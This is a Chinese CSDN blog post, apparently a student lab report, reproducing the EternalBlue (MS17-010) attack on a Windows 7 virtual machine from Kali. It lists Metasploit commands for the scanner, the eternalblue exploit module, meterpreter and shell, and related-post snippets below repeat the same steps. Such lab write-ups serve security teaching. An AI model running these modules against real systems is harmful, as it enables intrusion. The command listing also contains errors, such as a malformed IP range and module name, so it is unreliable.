实验一:永恒之蓝攻击复现实验报告

已于 2022-04-02 09:31:40 修改
阅读量4.6k 收藏 31
点赞数 4
分类专栏: 网络安全实验 文章标签: python 网络安全
于 2021-05-15 14:34:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44118750/article/details/116849203
版权 
姓名:软工女孩(b站同名)

一、实验项目名称
使用KALI进行MS17_010渗透提权

二、实验目的及要求

  1. 熟悉kali的基本安装与使用
  2. 理解软件msf的模块调用与使用
  3. 掌握MS17_010的模块的mimikatz软件使用
  4. 掌握windows的密码破解以及hash破解

三、实验环境
Windows、KALI

四、实验内容
5. 掌握永恒之蓝的使用以及msf模块的使用
6. 掌握基本提权与后门维持

五、实验步骤
1、搭建好环境准备,在WMware虚拟机软件中分别建立以kali和win7为镜像的虚拟机,按照步骤安装好后,配置好虚拟机设置以及网络连接。

2、分别打开两台虚拟机,在win7中打开cmd,查看ip地址
3、在Kali中打开终端,输入msfconsole
在这里插入图片描述

4、搜索永恒之蓝代号ms17_010
在这里插入图片描述

5、首先开始扫描局域网中存在的永恒之蓝的漏洞的电脑
在这里插入图片描述

6、填写需要扫描的网段并运行脚本
在这里插入图片描述

7、找到包含MS17-010(确定IP后面确定有ms17_010漏洞即可确定为漏洞)
8、调用攻击模块exploit/windows/smb/ms17_010_eternalblue
在这里插入图片描述

9、调用meterpreter工具攻击
在这里插入图片描述

六、实验程序与实验结果
实验程序:(详细见实验步骤截图代码命令)
msfconsole
search 17_010
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 192.168.199.136.0/24
run
use exploit/windows/smb/ms_010_eternalblue
meterpreter
shell

实验结果:
在这里插入图片描述
在这里插入图片描述

七、实验总结
通过本次实验我们学习复原了永恒之蓝的攻击原理及过程,初步熟悉了kali工具的基本使用,但对于代码的理解和运用仍需继续学习加强。

苦瓜姐
关注
  • 4
    点赞
  • 31
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
实验报告】网络渗透实验一 网络扫描与网络侦察
m0_52108440的博客
12-13 944
实验目的:理解网络扫描、网络侦察的作用;通过搭建网络渗透测试平台,了解并熟悉常用搜索引擎、扫描工具的应用,通过信息收集为下一步渗透工作打下基础。 系统环境:Kali Linux 2、Windows 网络环境:交换网络结构 实验工具: Metasploitable2(需自行下载虚拟机镜像);Nmap(Kali);WinHex、数据恢软件等 实验步骤 1. 用搜索引擎Google或百度搜索麻省理工学院网站中文件名包含“network security”的pdf文档,截图搜索得到的页面。 2、照片中的女生.
基础渗透测试实验—永恒之漏洞
G6_12的博客
06-08 4041
ms17-010,永恒之漏洞
永恒之实验 MS17-010
qq_43355651的博客
10-31 2779
永恒之MS17-010是2016年8月公开的漏洞,基于445端口迅速传播扩散,危害超出想象的严重。 实验准备: 虚拟机下kali攻击机:192.168.111.128 w7靶机:192.168.111.129 在同一网段并且能ping通 首先利用nmap对靶机进行扫描 Nmap -sV 192.168.111.129 发现存在开放445端口 那我们可以利用永恒之进行入侵 打开msfconsole 搜索ms17-010 这边我们可以进行选择可以利用的模块 use exploit
网络安全渗透测试实验
qq_60905276的博客
11-05 4783
理解网络扫描、网络侦察的作用;通过搭建网络渗透测试平台,了解并熟悉常用搜索引擎、扫描工具的应用,通过信息收集为下一步渗透工作打下基础。系统环境:Kali Linux 2、Windows网络环境:交换网络结构实验工具: Metasploitable2(需自行下载虚拟机镜像);Nmap(Kali);WinHex、数据恢软件等1、用搜索引擎Google或百度搜索麻省理工学院网站中文件名包含“network security”的pdf文档,截图搜索得到的页面。
2024年最新[永恒之]实战-漏洞现_永恒之漏洞现实(1)
2401_84297796的博客
05-03 756
1、msfconsole进入MSF模式,再测试能不能ping通目标主机(192.168.164.129),用nmap扫描主机开放445端口,接下用msf测试一下漏洞是否存在。3、我们在第二步的时候使用的是auxiliary模块进行的漏洞检测,这回我们使用exploit模块进行漏洞利用。2、这里我们先选择#1的auxiliary(辅助模块)先进行踩点,查看漏洞是否可以利用,再去进行渗透攻击。3、使用#show options 命令,查看需要设置的选项(Required为yes是必须设置的选项)。
EternalBlue【永恒之】漏洞详解(现、演示、远程、后门、入侵、防御)内容丰富-深入剖析漏洞原理-漏洞成因-以及报错解决方法-值得收藏!
m0_73734159的博客
12-26 5548
2017年永恒之漏洞,编号为ms17漏洞。现在只有一些低版本的电脑没有打ms17_010的补丁,windows7 以上版本几乎都没有这个漏洞了。虽然如此,此漏洞非常经典,现如今仍有很大的学习漏洞原理以及深入研究防御策略都有很大的借鉴和学习研究的意义。让大家可以对网络安全更加重视,网络安全刻不容缓,让我们为国家网络安全的建设共同努力!
永恒之(ms17-010)小实验
tmyzxy1314的博客
12-22 751
永恒之漏洞
永恒之(MS17-010)漏洞攻击实验
qq_37340973的博客
11-12 2235
前言    “永恒之”利用Windows系统的SMB漏洞可以获取系统最高权限,利用445端口入侵,获取shell进行提权。   工具:kali、windows7 一、开始攻击  ip:kali 192.168.1.100            windows7:192.168.1.101 首先我们ping一下目标靶机(windows7)   进入kali系统的msfconsole攻击框架 搜索MS17-010漏洞,先使用auxiliary/scanner/smb/smb_ms17_010这
记一次MSF永恒之入侵win7系统实验
weixin_62297109的博客
12-31 2762
MSF是渗透安全人员非常重要的,必须了解的一个软件,这次实验记录一些msf最基础最简单的用法和命令,希望对大家入门有所帮助
计算机操作系统实验报告
06-16
存储管理,设备管理,进程管理,文件管理,银行家算法完整实验报告,有代码
网络渗透试实验报告
weixin_51646864的博客
10-31 5613
网络渗透试实验报告 实验一 网络扫描与网络侦察 实验目的: 理解网络扫描、网络侦察的作用;通过搭建网络渗透测试平台,了解并熟悉常用搜索引擎、扫描工具的应用,通过信息收集为下一步渗透工作打下基础。 系统环境:Kali Linux 2、Windows 网络环境:交换网络结构 实验工具: Metasploitable2;Nmap(Kali);WinHex、数据恢软件等 实验原理: 1、网络扫描与网络侦察的目的 搜集目标信息,采用七个基本的步骤: (1) 找到初始信息,比如一个IP地址或者一个域名; (2)
渗透基础笔记+作业(永恒之现)
09-08
MS17-010,也称为“永恒之”,是一个著名的漏洞,主要影响Windows操作系统,尤其是Windows 7。现环境通常包括攻击机(如Kali Linux)和靶机(如Windows 7)。工具如Nmap用于网络扫描,Metasploit则作为渗透框架...
正点原子列表和列表项实验现资料
最新发布
05-23
【正点原子】列表和列表项实验现资料
合工大嵌入式实验报告
01-17
这份实验报告详细记录了学生在学习过程中的探索和成果。 实验报告通常包括以下几个部分: 1. **实验目的**:明确实验的目标,可能是掌握嵌入式系统的基本结构,理解操作系统内核,或者学习特定硬件平台的编程方法...
永恒之漏洞利用及攻击
热门推荐
wwl012345的博客
04-20 9万+
一、基础知识介绍: 1.何为永恒之? 永恒之(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎...
认知实习实验报告
EloflyS的博客
09-09 1090
认知实习实验报告 实验准备:实验环境的搭建 准备VMWare虚拟机平台,在官方网站上下载Kali Linux并安装在VMWare中,作为实验攻击机;再下载一个没有修MS17-010漏洞(永恒之)的Windows7安装在虚拟机当中,并在安装完成后关闭防火墙,打开445端口,作为被攻击的靶机,到此,实验环境搭建完毕 实验一:社会工程攻击的识别与防御 实验二:信息收集和漏洞扫描 为了对靶机进行攻击,我们首先需要获取该靶机的IP地址,获取方式就是在靶机中打开终端cmd,在其中输入以下命令 ipconfig
Metasploit渗透测试实验报告
ling_xiao007的专栏
02-21 1万+
《Metasploit渗透测试魔鬼训练营》一书采用独特的让读者成为虚拟渗透测试的主角的方式,经历一次对DVSSC公司网络的渗透测试任务。渗透测试的目标为DVSSC公司DMZ网段以及内网客户端主机。四个主机均存在严重漏洞缺陷,可执行不同方式的攻击方式。 信息搜集阶段获得了dvscc的域名注册信息、地理位置,以及DMZ网段操作系统版本、开放端口及其服务版本等信息,但域名注册信息存有疑问。 漏洞扫描阶段获得DMZ网段主机大量漏洞信息,可采取不同方式的攻击方式,如口令猜测、网络服务渗透攻击、浏览器渗
永恒之漏洞现流程
09-01
永恒之漏洞的现流程大致如下: 1. 首先,你需要准备两台机器,一台是攻击机(Linux kali),另一台是靶机(Windows 2008R2)。 2. 打开Metasploit框架,可以使用命令`msfconsole`。 3. 在Metasploit框架中,使用`search ms17_010`命令搜索永恒之漏洞的相关代码。你会找到两个工具,其中`auxiliary/scanner/smb/smb_ms17_010`是用于扫描漏洞的模块,`exploit/windows/smb/ms17_010_eternalblue`是用于攻击的代码。一般情况下,你需要先使用扫描模块,如果显示存在漏洞,再使用攻击代码进行攻击。 4. 配置攻击目标IP,使用命令`use exploit/windows/smb/ms17_010_eternalblue`选择攻击模块。 5. 接下来,你需要使用该模块对靶机服务器进行攻击。使用命令`set RHOSTS <靶机IP>`来配置目标IP。 6. 最后,执行攻击命令,例如使用`exploit`命令开始攻击。 需要注意的是,现永恒之漏洞属于安全研究领域,只应在合法的环境下进行,并遵守相关法律法规。在实际环境中,应该始终保持系统和软件的更新,以免存在已知漏洞。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [永恒之漏洞现](https://blog.csdn.net/weixin_39096432/article/details/115422428)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值